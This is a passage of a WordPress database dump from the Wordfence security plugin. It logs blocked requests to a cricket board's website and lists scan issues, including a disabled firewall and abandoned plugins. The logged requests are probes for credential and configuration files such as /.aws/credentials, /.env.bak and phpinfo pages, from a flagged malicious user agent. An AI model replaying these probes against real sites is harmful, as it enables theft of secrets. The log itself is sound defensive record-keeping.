User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(913,1630536232.123953,1630536232.036700,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(914,1630536217.516382,1630536217.426900,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(915,1630536209.794034,1630536209.702300,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(916,1630536202.787027,1630536202.697400,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(917,1630536196.829494,1630536196.741600,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(918,1630536191.545817,1630536191.459000,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(919,1630536183.480791,1630536183.393000,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(920,1630536174.356797,1630536174.266700,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(921,1630536170.149761,1630536170.066100,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(922,1630536165.585435,1630536165.464700,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}');
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=221 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (45,1624416681,1624416681,'new','wafStatus',100,'05bb5677cd06ca8ab34749c87f936281','114d3f6cc78099138c7197127bcd170f','Web Application Firewall is disabled','Wordfence\'s Web Application Firewall has been unexpectedly disabled. If you see a notice at the top of the Wordfence admin pages that says \"The Wordfence Web Application Firewall cannot run,\" click the link in that message to rebuild the configuration. If this does not work, you may need to fix file permissions. <a href=\"https://www.wordfence.com/help/?query=scan-result-waf-disabled\" target=\"_blank\" rel=\"noopener noreferrer\">More Details</a>','a:2:{s:9:\"wafStatus\";s:8:\"disabled\";s:16:\"wafStatusDisplay\";s:8:\"Disabled\";}'),(89,1624417148,1624417148,'new','wfPluginAbandoned',50,'9ac1eb7a925ba9aaae66e09412eee45a','9ac1eb7a925ba9aaae66e09412eee45a','The Plugin \"Contact Form 7 Designer\" appears to be abandoned (updated May 8, 2015, tested to WP 4.1.33).','It was last updated 6 years 1 month ago and tested up to WordPress 4.1.33. Plugins can be removed from wordpress.org for various reasons. This can include benign issues like a plugin author discontinuing development or moving the plugin distribution to their own site, but some might also be due to security issues. In any case, future updates may or may not be available, so it is worth investigating the cause and deciding whether to temporarily or permanently replace or remove the plugin. <a href=\"https://www.wordfence.com/help/?query=scan-result-plugin-abandoned\" target=\"_blank\" rel=\"noopener noreferrer\">Get more information.</a>','a:19:{s:4:\"name\";s:23:\"Contact Form 7 Designer\";s:4:\"slug\";s:23:\"contact-form-7-designer\";s:7:\"version\";s:3:\"1.1\";s:6:\"author\";s:66:\"<a href=\"http://www.tinygiantstudios.co.uk\">Tiny Giant Studios</a>\";s:14:\"author_profile\";s:47:\"https://profiles.wordpress.org/tinygiantstudios\";s:8:\"requires\";s:3:\"3.8\";s:6:\"tested\";s:6:\"4.1.33\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}s:11:\"num_ratings\";i:6;s:15:\"support_threads\";i:1;s:24:\"support_threads_resolved\";i:1;s:12:\"last_updated\";s:21:\"2015-05-08 5:37pm GMT\";s:8:\"homepage\";s:29:\"http://tinygiantstudios.co.uk\";s:13:\"download_link\";s:70:\"https://downloads.wordpress.org/plugin/contact-form-7-designer.1.1.zip\";s:11:\"dateUpdated\";s:11:\"May 8, 2015\";s:9:\"abandoned\";b:1;s:10:\"vulnerable\";b:0;s:5:\"wpURL\";s:53:\"https://wordpress.org/plugins/contact-form-7-designer\";}'),(90,1624417148,1624417148,'new','wfPluginAbandoned',50,'47fe0728d93e4e740c66566775f8f591','47fe0728d93e4e740c66566775f8f591','The Plugin \"Spam Captcha\" appears to be abandoned (updated April 19, 2016, tested to WP 4.5.24).','It was last updated 5 years 2 months ago and tested up to WordPress 4.5.24. Plugins can be removed from wordpress.org for various reasons. This can include benign issues like a plugin author discontinuing development or moving the plugin distribution to their own site, but some might also be due to security issues. In any case, future updates may or may not be available, so it is worth investigating the cause and deciding whether to temporarily or permanently replace or remove the plugin. <a href=\"https://www.wordfence.com/help/?query=scan-result-plugin-abandoned\" target=\"_blank\" 